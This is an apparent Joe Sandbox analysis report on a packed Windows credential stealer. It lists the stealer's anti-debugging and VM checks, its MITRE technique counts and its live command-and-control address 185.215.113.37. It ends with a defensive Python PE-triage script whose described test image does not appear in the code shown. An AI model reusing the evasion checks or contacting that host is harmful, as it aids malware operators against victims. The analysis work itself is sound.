                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00CB4910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00CADA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CAE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00CAE430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00CB4570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CAED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00CAED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CA16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00CA16D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00CB3EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CAF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00CAF6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00CABE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00CADE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CA1160 GetSystemInfo,ExitProcess | 0_2_00CA1160
                Source: file.exe, file.exe, 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1367337890.0000000000A32000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1367337890.0000000000A03000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWhp
                Source: file.exe, 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13707
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13704
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13723
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13759
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13719
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CA45C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_00CA45C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00CB9860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB9750 mov eax, dword ptr fs:[00000030h] | 0_2_00CB9750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA | 0_2_00CB78E0
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6952, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: gProgram Manager
Source: file.exe | Binary or memory string: gProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB7B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1326837199.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6952, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1326837199.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6952, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

MITRE ATT&CK Matrix (one tactic per column; a leading number marks a technique matched by the report's signatures, with the count the report shows; unnumbered cells are the unmatched entries of the matrix)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
file.exe | 47% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No contacted domains info

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | | unknown

URLs from memory and binary strings (the characters following the path in several entries, such as Wi, ktop, 0, ?, ws and g, are adjacent bytes picked up when the URL was carved from process memory, not part of the URL)
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37Wi | file.exe, 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37//% | file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37/e2b1563c6670f193.phpktop | file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php0 | file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37/e2b1563c6670f193.php? | file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37/:% | file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37/e2b1563c6670f193.phpg | file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
General Information
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1520640
Start date and time: 2024-09-27 17:40:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 82
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big: too many NtQueryValueKey calls found
• VT rate limit hit for: file.exe
No simulations

Context: IP 185.215.113.37 seen in earlier analyses
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | 8y4qT1eVpi.exe | malicious | Amadey, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
No context

Context: ASN WHOLESALECONNECTIONSNL seen in earlier analyses
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | kYpONUhAR5.exe | malicious | RedLine | 185.215.113.67
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | 185.215.113.103
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
No context
No created / dropped files found
Static File Info
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.950289815531836
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'847'808 bytes
MD5: fe0680dfa4a95f3c9f5efe7b68bebdc8
SHA1: e9bc2c7b21daeb95a9d77aa34afc1476648b573f
SHA256: aeb0218c5ae46c5d264100339920bca9c56a8f83b0a37383dbea2e33683d35d8
SHA512: 7c0416ea98c918e103fded52756677d72a887e47cbde16fee5f7e447d2dec1fcff758f1ebb12add4d6439497b0899aa2b7c25e83200b806039ab188957861c7a
SSDEEP: 49152:kS+0TkTdhEbo+v+W3rzuEcVYobaS0aZ8iWv5i:kAkj+9H3rAVaS0vt
TLSH: C98533AE1A1B107BD4D5B47003FF1E49FB8C152474E16AD28A318676CBE7AA1BF32C15
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xa9e000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Entrypoint Preview (instructions decoded at the entry point 0xa9e000 in section .taggant; after the initial jmp the bytes are mostly zeros, and a 00 00 byte pair decodes as add byte ptr [eax], al, so the listing below is padding rather than meaningful code)
                                      jmp 00007F86386BED2Ah
                                      movups xmm3, dqword ptr [eax+eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      jmp 00007F86386C0D25h
                                      add byte ptr [edi], al
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax+eax], ah
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      and dword ptr [eax], eax
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or al, 80h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      pop es
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax+eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      and al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add dword ptr [eax+00000000h], eax
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add dword ptr [edx], ecx
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or dword ptr [eax+00000000h], eax
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      pop es
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [edi], bl
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], ah
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319
Data Directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x25b000 | 0x22800 | d14b2abdbd6203f2e6be5941cbdeb89e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x25e000 | 0x2a2000 | 0x200 | 73ef0bbdbe85d60f62bd98f77be3600d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vpiveclu | 0x500000 | 0x19d000 | 0x19d000 | 136ba286d3ed0550c701089edd175b03 | False | 0.9948866430841404 | data | 7.954457957368027 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
abjcrpar | 0x69d000 | 0x1000 | 0x400 | 1e9dfa31a6599407b9e827ad9dfc30ca | False | 0.697265625 | data | 5.680595868484483 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x69e000 | 0x3000 | 0x2200 | 77b3be650c20a3216c65621ec2130d2f | False | 0.09708180147058823 | DOS executable (COM) | 1.1952884008350921 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports
DLL | Import
kernel32.dll | lstrcpy
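The section table and import list above carry the static packer indicators the report's signature list names: two sections with no name and two with random eight-letter names (vpiveclu, abjcrpar), every code-bearing section marked readable, writable and executable, a first section whose 0x25b000 bytes of virtual space dwarf its 0x22800 bytes on disk, a 7.95-entropy section, an entry point (0xa9e000 minus image base 0x400000 = RVA 0x69e000) inside .taggant, and a single import, kernel32!lstrcpy, so everything else is resolved at run time through the GetProcAddress chain seen in the behavior section. The script below is an added example and not part of the Joe Sandbox report: a standard-library-only PE32 header walker plus a triage function that flags exactly those indicators. The PE image it runs on is constructed inside the block to mirror the report's layout (section names, virtual addresses, flags, entry point); its raw contents and on-disk sizes are synthetic and it is not the analysed sample.

```python
import math
import struct

# Section characteristics from winnt.h.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Section names a linker emits; an entry point anywhere else usually means a packer stub.
COMMON_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc", ".reloc", ".bss", ".tls", ".pdata"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(pe: bytes) -> dict:
    """Walk DOS header -> PE signature -> file header -> optional header -> section headers."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    file_hdr = e_lfanew + 4
    nsections, = struct.unpack_from("<H", pe, file_hdr + 2)
    opt_size, = struct.unpack_from("<H", pe, file_hdr + 16)
    opt_hdr = file_hdr + 20
    magic, = struct.unpack_from("<H", pe, opt_hdr)
    entry_rva, = struct.unpack_from("<I", pe, opt_hdr + 16)
    if magic == 0x10B:                                   # PE32: ImageBase is a DWORD at +28
        image_base, = struct.unpack_from("<I", pe, opt_hdr + 28)
    elif magic == 0x20B:                                 # PE32+: ImageBase is a QWORD at +24
        image_base, = struct.unpack_from("<Q", pe, opt_hdr + 24)
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    sections = []
    for i in range(nsections):
        off = opt_hdr + opt_size + 40 * i                # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        flags, = struct.unpack_from("<I", pe, off + 36)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "va": va, "vsize": vsize, "raw_size": raw_size,
                         "flags": flags, "entropy": shannon_entropy(raw)})
    return {"entry_rva": entry_rva, "image_base": image_base, "sections": sections}


def triage(pe: bytes) -> list:
    """Flag the static packer indicators the report lists; returns human-readable findings."""
    info = parse_pe(pe)
    ep = info["entry_rva"]
    rwx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    findings = []
    for s in info["sections"]:
        name = s["name"]
        if s["va"] <= ep < s["va"] + max(s["vsize"], s["raw_size"]) and name not in COMMON_SECTIONS:
            findings.append(f"entry point 0x{ep:x} lies in non-standard section {name!r}")
        if s["flags"] & rwx == rwx:
            findings.append(f"section {name!r} is writable and executable")
        if not name or not all(c.isalnum() or c in "._$" for c in name):
            findings.append(f"section {name!r} has an empty or unusual name")
        if s["raw_size"] and s["vsize"] > 16 * s["raw_size"]:   # room reserved for unpacked code
            findings.append(f"section {name!r} is mostly virtual (0x{s['vsize']:x} virtual, 0x{s['raw_size']:x} on disk)")
        if s["entropy"] > 7.0:                                    # compressed or encrypted payload
            findings.append(f"section {name!r} has entropy {s['entropy']:.2f}")
    return findings


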